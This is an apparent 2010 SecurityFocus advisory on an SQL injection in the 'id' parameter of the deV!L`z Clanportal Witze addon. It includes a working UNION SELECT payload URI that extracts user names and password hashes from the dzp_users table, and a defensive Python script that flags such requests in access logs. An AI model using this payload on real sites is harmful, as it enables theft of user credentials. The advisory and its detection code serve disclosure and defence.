deV!L`z Clanportal Witze Addon 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+
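
One way to find requests of this kind in web-server access logs, as an added example that is not part of the original advisory: it flags any request to jokes/index.php whose decoded 'id' value is not a short positive integer. The combined log format, the 10-digit bound on a valid id, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate joke id is a short positive integer.
VALID_ID_RE = re.compile(r"\d{1,10}")

# Constructed sample lines; the second carries the request from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /jokes/index.php?action=show&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] '
    '"GET /jokes/index.php?action=show&id=9999999999999999999999999999'
    '+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+ HTTP/1.1" 200 4310',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /news/index.php?id=abc HTTP/1.1" 200 900',
]

def suspicious_id(log_line):
    """Return the decoded 'id' value when the line is a request to the
    Witze addon with a non-integer id; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/jokes/index.php"):
        return None
    # parse_qs decodes '+' and %xx, so encoded variants are checked too.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("id", []):
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_id) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_id(line)) is not None]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-integer id {value!r}")
```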


 

Copyright 2010, SecurityFocus